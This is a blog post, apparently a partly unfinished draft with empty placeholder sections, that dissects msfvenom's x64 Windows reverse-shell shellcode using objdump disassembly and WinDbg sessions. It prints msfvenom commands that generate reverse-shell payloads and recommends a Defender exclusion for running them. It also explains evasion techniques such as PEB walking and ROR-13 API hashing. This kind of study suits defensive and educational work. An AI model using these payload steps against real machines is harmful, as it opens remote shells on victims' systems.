Post

Analyzing msfvenom's reverse shell payload - Windows

This is my attempt at breaking down the shellcode used in msfvenom's reverse shell payload on windows, and exploring how it works.

Analyzing msfvenom's reverse shell payload - Windows

Add Introduction Here

Prerequisites

Shellcode

As the title mentions, I used msfvenom to generate the shellcode I was going to decipher. msfvenom is a free tool offered in the Metasploit Framework. I also used the objdump command in Linux to convert the shellcode into assembley instructions.

1
2
3
4
5
# generate windows reverse shell code in binary format
msfvenom -p windows/x64/shell_reverse_tcp LHOST=127.0.0.1 -f raw -o revshell.bin

# decompile the shellcode into human readable assembly shode
objdump -D -b binary -M intel -m i386:x86-64 revshell.bin

Since anyone can use msfvenom, I am not going to include the shellcode. Instead I will explain snippets as I go. Feel free to generate the shellcode and follow along if you’d like.

Windows 11 VM & WinDbg

I’ve setup a Windows 11 VM to run the shellcode in a debugger. Since Defender has signatures stored for all msfvenom payloads, you’ll need to add an exception in defender for the directory you plan to store the msfvenom executable. Otherwise, defender will flag and delete the executable the second it touches the disk.

While deciphering the shellcode, I used WinDbg to help step thru some of the instructions. This helped me to better understand how the shellcode was working. To generate a working payload to run in WinDbg, I had msfvenom create an executable instead of outputting the payload in raw binary format (like I did in the shellcode section).

1
2
# generate windows reverse shell executable to run in WinDbg
msfvenom -p windows/x64/shell_reverse_tcp LHOST=127.0.0.1 -f exe -o revshell.exe

Patience

Lastly, I am NOT an expert at shellcoding. With that being said, I expected this to be an easy task and was quickly humbled! There were a lot of times where I almost gave up because I had no idea what I was doing. But with a lot of patience (and a little bit of help from Claude :)), I was able to see this project to completion.

Shellcode Analysis

Add Content Here

Part 1 - Initial Setup

1
2
3
0:      fc                      cld
1:      48 83 e4 f0             and    rsp,0xfffffffffffffff0
5:      e8 cc 00 00 00          call   0xca

What these first few instructions do is setup the program for execution. The first instruction clears the direction flag in EFLAGS (setting it to 0), making the shellcode position independent.

The next instruction aligns the stack to a 16-byte boundry, ensuring stack pointer addresses are multiples of 16. This is a common instruction in x64 calling conventions, maximizing performance and preventing program crashes.

The final instuction sets our instruction pointer to 0xca (as well as other things). I will go over the importance of this instruction more in part 4.

Part 2 - PEB Walking & API HAshing

This part will go over instructions from 0xa to 0xc5. I will not paste the whole section here, but instead paste snippets where it’s necessary in an attempt to keep this neat and organized.

1
2
3
4
5
6
   a:   41 51                   push   r9
   c:   41 50                   push   r8
   e:   52                      push   rdx
   f:   51                      push   rcx
  10:   56                      push   rsi
  11:   48 31 d2                xor    rdx,rdx 

These first few instructions push the r9, r8, rdx, rcx, and rsi register values to the stack so that they can be restored to their previous state after completion. The last instruction will zero out rdx.

1
2
3
4
5
  14:   65 48 8b 52 60          mov    rdx,QWORD PTR gs:[rdx+0x60]
  19:   48 8b 52 18             mov    rdx,QWORD PTR [rdx+0x18]
  1d:   48 8b 52 20             mov    rdx,QWORD PTR [rdx+0x20]
  21:   48 8b 72 50             mov    rsi,QWORD PTR [rdx+0x50]
  25:   48 0f b7 4a 4a          movzx  rcx,WORD PTR [rdx+0x4a]

The first instruction grabs the pointer address for the executable’s PEB (Process Enironment Block) and moves it into the rdx register. The PEB is responsible for storing information about the running process like PID, command line args, imported DLLs, etc.

The next three instructions will move the pointer address for PEB -> PEB_LDR_DATA -> InMemeoryOrderModuleList into the rdx register. Then will move the pointer address for the DLL name buffer into the rsi register. This is refered to as PEB walking, a technique commonly used by malicious processes to covertly look up functions in memory.

The last instruction collects the pointer address for the length of the DLL name buffer and stores it in the rcx register. This will be used to iterate over our hashing loop.

1
2
3
4
5
6
7
8
9
  2a:   4d 31 c9                xor    r9,r9
  2d:   48 31 c0                xor    rax,rax
  30:   ac                      lods   al,BYTE PTR [rsi]
  31:   3c 61                   cmp    al,0x61
  33:   7c 02                   jl     0x37
  35:   2c 20                   sub    al,0x20
  37:   41 c1 c9 0d             ror    r9d,0xd
  3b:   41 01 c1                add    r9d,eax
  3e:   e2 ed                   loop   0x2d

The first two instructions zero out the r9 and rax registers. From there, the lods instruction loads the next byte from the rsi register into the al register (lowest 8 bits of rax). lods will auto-increment rsi to the next byte on its own.

Instructions 0x31 to 0x35 check to see if the byte stored in the al register represents a lower-case letter, if so, it will make the letter upper-case.

Afterwards, ror rotates the bytes in the lower byte of the r9 register to the right 0xd (dec: 13) times, then adds eax (the byte that came from rsi register) to the just rotated bytes.

It continues on this loop until the end of the Dll name buffer has been reached. This technique is refered to as ROR-13 hashing, and is used to hide library function names within shellcode, making it harder for AV/EDR solutions to detect and signature common functions used in malware.

The following is a run thru of what this hashing loop looks like from within WinDbg:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
# set a breakpoint for 0x2d
bp 00000001`4000502d

# print r9 register then continue until next breakpoint (start of hash loop)
r r9
g

# cleaned-up output
0:
r9=0000000000000000
1:
r9=0000000000000052
2:
r9=0000000002900000
...
24:
r9=000000005fa59484
25:
r9=00000000a422fd2c

Part 3 - Export Table Walking

Part 4 - Connect to Attacker Machine (via Winsock)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
5:      e8 cc 00 00 00          call   0xd6
a:      41 51                   push   r9
...
d6:     5d                      pop    rbp
d7:     49 be 77 73 32 5f 33    movabs r14,0x32335f327377
de:     32 00 00 
e1:     41 56                   push   r14
e3:     49 89 e6                mov    r14,rsp
e6:     48 81 ec a0 01 00 00    sub    rsp,0x1a0
ed:     49 89 e5                mov    r13,rsp
f0:     49 bc 02 00 11 5c 7f    movabs r12,0x100007f5c110002
f7:     00 00 01 
fa:     41 54                   push   r12
fc:     49 89 e4                mov    r12,rsp                
ff:     4c 89 f1                mov    rcx,r14
102:    41 ba 4c 77 26 07       mov    r10d,0x726774c
108:    ff d5                   call   rbp

Now, I’ve included the instructions at 0x5 and 0xa, then the jump to 0xd6 to explain what is occuring here. What the call instruction at 0x5 is doing is 1) taking the address of the next instruction, 0xa, and pushing it to the stack. And 2) setting the instruction pointer to 0xd6.

After this, the instruction at 0xd6 takes the address previously pushed to the stack, 0xa, and moves it to the RBP register. What this essentially does is turn RBP into our return instruction pointer, as you can see in the call instruction to 0x108.

This can all be verified by stepping thru our executable in WinDbg:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
######################################################################
# Set breakpoint to `0x5`, go, then print RIP & RBP and print stack. #
######################################################################

0:000> bp 00000001`40005005
0:000> g
Breakpoint 0 hit
0:000> r rip, rbp
rip=0000000140005005 rbp=0000000000000000
0:000> k
 # Child-SP          RetAddr              Call Site
00 00000000`0015ff50 00000000`00000000    revshell+0x5005 

####################################################################
# Step into call instruction then print RIP & RBP and print stack, #
# showing stack contains `0xa` instruction address.                #
####################################################################

0:000> t
0:000> r rip, rbp
rip=00000001400050ca rbp=0000000000000000
0:000> k
 # Child-SP          RetAddr               Call Site
00 00000000`0015ff48 00000001`4000500a     revshell+0x50ca
01 00000000`0015ff50 00000000`00000000     revshell+0x500a

###############################################################
# Step instruction then print RIP & RBP and print stack,      #
# showing stack no longer contains `0xa` instruction address, #
# but the address is now in the RBP register.                 #
###############################################################

0:000> t
0:000> r rip, rbp
rip=00000001400050cb rbp=000000014000500a
0:000> k
 # Child-SP          RetAddr               Call Site
00 00000000`0015ff50 00000000`00000000     revshell+0x50cb
1
2
3
d7:     49 be 77 73 32 5f 33    movabs r14,0x32335f327377
de:     32 00 00 
e1:     41 56                   push   r14

We will now move the String 0x32335f327377 (converts to “ws2_32\0”) into the R14 register, and push R14 to the stack. This string is used for importing the Winsock library (what we’ll use to connect to our attacker machine).

Part 5 - Spawn a Shell

Conclusion

This post is licensed under CC BY 4.0 by the author.